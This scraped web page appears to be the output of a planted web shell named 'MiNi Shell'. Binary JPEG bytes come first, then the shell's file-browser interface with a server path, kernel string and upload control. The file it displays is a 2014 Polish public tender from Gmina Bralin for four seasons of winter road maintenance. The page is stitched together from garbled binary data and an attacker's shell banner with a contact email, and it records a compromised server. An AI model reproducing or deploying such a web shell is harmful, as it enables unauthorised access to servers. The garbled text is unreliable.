JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20141009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20141009/213753-N-2014.html

<p class="kh_header"><b>Bralin: Prowadzenie akcji zimowego utrzymania dróg i ulic będących w zarządzie Gminy Bralin przez okres 4 sezonów zimowych</b><br>
<b>Numer ogłoszenia: 213753 - 2014; data zamieszczenia: 09.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bralin , Rynek 3, 63-640 Bralin, woj. wielkopolskie, tel. (062)  7811201, faks (062)  7811202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bralin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie akcji zimowego utrzymania dróg i ulic będących w zarządzie Gminy Bralin przez okres 4 sezonów zimowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot i zakres zamówienia:  
1)	Przedmiotem zamówienia jest zimowe utrzymanie dróg i ulic gminnych i innych będących w zarządzie Gminy Bralin przez okres 4 sezonów zimowych: 2014/2015,  2015/2016,  2016/2017,  2017/2018.
2)	Łączna długość dróg gminnych przeznaczonych do zimowego utrzymania w sezonach wynosi ok. 60 km (w tym łącznie do posypywania przewiduje się około 15 km).
3)	Inne postanowienia dotyczące przedmiotu zamówienia:
a)	Wykonawca zapewnia materiały do usuwania śliskości zimowej dróg (zapobiegania powstawaniu i likwidacji oblodzeń i gołoledzi, zapobieganiu powstawania i likwidacji  śliskości pośniegowej):
- kruszywo naturalne (piasek) o uziarnieniu do 4 mm,
- sól drogowa (chlorek sodu) wg normy PN-86/C-84081/02,
sporządza mieszankę o składzie: 20-25% soli i 75-80% kruszywa,
we własnym zakresie organizuje miejsca do składowania materiałów do posypywania dróg;
b)	Wykonawca winien stosować środki do usuwania śliskości zimowej dróg wg wymogów załącznika nr 1 do rozporządzenia Ministra Środowiska z dnia 27.października 2005r. w sprawie rodzajów i warunków stosowania środków, jakie mogą być używane na drogach publicznych oraz ulicach i placach (Dz.U. z 2005r. Nr 230, poz.1960);
c)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę 
(i podwykonawców) w związku z wykonywaniem przedmiotu zamówienia;
d)	Wykonawca ponosi pełną odpowiedzialność za ewentualne straty, szkody i następstwa nieszczęśliwych wypadków wynikające z realizacji przedmiotu zamówienia.
2. Warunki realizacji zamówienia
1)	Wymagania sprzętowe:
a)	Wymagane są trzy zestawy sprzętowe do odśnieżania dróg (obsługujące teren Gminy Bralin), które wyposażone będą w system monitoringu pracy sprzętu, w tym GPS (jak określono w zał. nr 8 do SIWZ), dla którego Wykonawca udostępni Zamawiającemu w systemie online aplikację umożliwiającą podgląd w czasie rzeczywistym jak i w historii co najmniej następujących parametrów pracy:
- opuszczanie / podnoszenie pługa oraz rejestracje czasu trwania danego zdarzenia,
- rzeczywiste posypywanie drogi czynnikiem uszorstniającym (czujnik optyczny posypu) oraz rejestracje czasu trwania danego zdarzenia,
                   z tego co najmniej dwa zestawy muszą być zaopatrzone w rozsypywarki do rozsypywania 
                   mieszanki piasku z solą.
W tym co najmniej dwa zestawy muszą pozostawać w sprawności technicznej i ciągłej gotowości do wyłącznej dyspozycji Gminy Bralin na cele prowadzenia zimowego utrzymania dróg.
Uwaga. zakup, montaż, utrzymanie systemu monitoringu, w tym GPS - po stronie wykonawcy.
b)	Wykonawca musi dysponować odpowiednim sprzętem pozwalającym na należytą realizację przedmiotu umowy, jak wskazano w pkt C.2. SIWZ. , ,

    2) Wymagania w zakresie zimowego utrzymania dróg:
a)	drogi gminne i ulice należy odśnieżać obustronnie tj. na całej jej szerokości jezdni,
b)	odcinki dróg proste i równe nie zlodowaciałe (nie śliskie) nie podlegają posypywaniu materiałami szorstkimi, za wyjątkiem zaistnienia gołoledzi lub zbitej, śliskiej warstwy śniegu,
c)	podjazdy, wzniesienia, łuki, zakręty, skrzyżowania itp. podlegają posypywaniu w całości i z zapasem ok. 40 m przed i po w/w elementach dróg, np. 40 m przed skrzyżowaniem i 40m za skrzyżowaniem, chyba, że zajdzie potrzeba posypania odcinka drogi o większej długości (stwierdzenie takiej konieczności w gestii operatora za wcześniejszym uzgodnieniu z Koordynatorem ze strony urzędu). Posypywaniu podlegać będą również place manewrowe, pętle i zatoki autobusowe zwłaszcza te zlokalizowane na wzniesieniach,
d)	maź i błoto pośniegowe powstałe po chwilowym wzroście temperatury należy usuwać na bieżąco, nie dopuszczając do jego zamarznięcia na jezdni,
e)	usuwanie i zwalczanie śliskości zimowej na bieżąco w miarę zaistniałych potrzeb (opady śniegu, mżawki),
f)	rozpoczęcie prac nie później niż po 1 godzinie po zakończeniu opadu, w przypadku opadów nocnych nie później niż przed godziną 5.00, a zakończenie nie później niż po 4 godzinach po zakończeniu opadu,
g)	w przypadku braku opadów śniegu i gołoledzi, akcji zimowego utrzymania dróg nie prowadzi się. Wykonawcy przez okres wstrzymania akcji nie przysługuje wynagrodzenie. Zamawiający przewiduje płatności z tytułu gotowości do realizacji przedmiotu zamówienia,
h)	wznowienie akcji następuje z chwilą stwierdzenia takiej konieczności przez Wykonawcę w porozumieniu z pracownikiem Urzędu Gminy Bralin,
i)	Wykonawca zobowiązany jest do zapewnienia swojej gotowości do prowadzenia zimowego utrzymania dróg w okresie od 25 października do 25 kwietnia w każdym sezonie zimowym, przy czym w 2014 roku od 30 października.
j)	Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
3) Wykonawca musi zapewnić dyspozycyjność całodobowo, również w dni wolne od pracy (soboty, niedziele i święta). Wymagane jest posiadanie telefonu komórkowego przez wszystkie osoby po stronie Wykonawcy biorące czynny udział przy wykonywaniu przedmiotu zamówienia.
4) Zamawiający nie ponosi odpowiedzialności z tytułu uszkodzeń mienia wskutek działań w ramach akcji zimowego utrzymania dróg, takich jak np. odpryski lakieru na samochodach wskutek działania piaskarki, uszkodzenia ogrodzeń i innych obiektów bądź elementów zabudowy wskutek działania pługów lemieszowych lub wirnikowych itp. W związku z powyższym w interesie Wykonawcy jest zachowanie najwyższej staranności operatorów sprzętu w trakcie prowadzonej akcji, zwłaszcza w miejscach wąskich, słabo dostępnych, z ograniczoną możliwością manewrowania.
3. Termin wykonania zamówienia: 
Sezony zimowe: 2014/2015,  2015/2016,  2016/2017,  2017/2018  (od dnia 30.10.2014r. do dnia 25.04.2018 r.).   Terminy rozpoczęcia i zakończenia akcji ZUD w poszczególnych sezonach ruchome - uzależnione od warunków atmosferycznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.04.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załączonymi do oferty dokumentami żądanymi przez Zamawiającego wykonawca winien wykazać Zamawiającemu że na czas realizacji zamówienia będzie dysponował odpowiednio niezbędnym sprzętem tj.:
1)	co najmniej trzy zestawy sprzętowe do odśnieżania dróg. Każdy zestaw sprzętowy musi posiadać pług, a dwa z nich dodatkowo rozsypywarki do rozsypywania mieszanki piasku z solą. 
2)	co najmniej jeden sprzęt do odśnieżania dróg (ciągnik z pługiem lub inny sprzęt) musi umożliwiać manewrowanie w wąskich uliczkach w strefie zabudowy (m.in.ślepe uliczki), przy czym może to być sprzęt wskazywany w punkcie jak powyżej;
3)	co najmniej jeden zestaw do udrażniania dróg i odwozu zalegającego śniegu -  zestaw ten musi posiadać spycharko-ładowarkę oraz dwie jednostki samowyładowcze tj. ciągniki z przyczepą samowyładowczą lub samochody samowyładowcze.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Oferta wykonawcy wg wzoru (zał. nr 1 do SIWZ).
2)	Dowód wniesienia wadium -jak opisano w SIWZ.
3)	Dokument potwierdzający, że osoby podpisujące ofertę są prawnie umocowane do reprezentowania wykonawcy - tylko w przypadku, gdy umocowanie takie nie wynika bezpośrednio z załączonego do oferty odpisu z właściwego rejestru.
4)	Oświadczenie wykonawcy (wg wzoru -zał. nr 2 do SIWZ) o spełnianiu wymogów art.22 ust.1 ustawy.
5)	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia (art. 23 ust.2) - tylko w przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. konsorcjum).
6)	Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić zamawiającemu (art. 26 ust.2b), iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Określono w załączniku nr 7 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bralin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Bralin, ul. Rynek 3, 63-640 Bralin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2014 godzina 11:00, miejsce: Gmina Bralin, ul. Rynek 3, 63-640 Bralin, sekretariat - pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com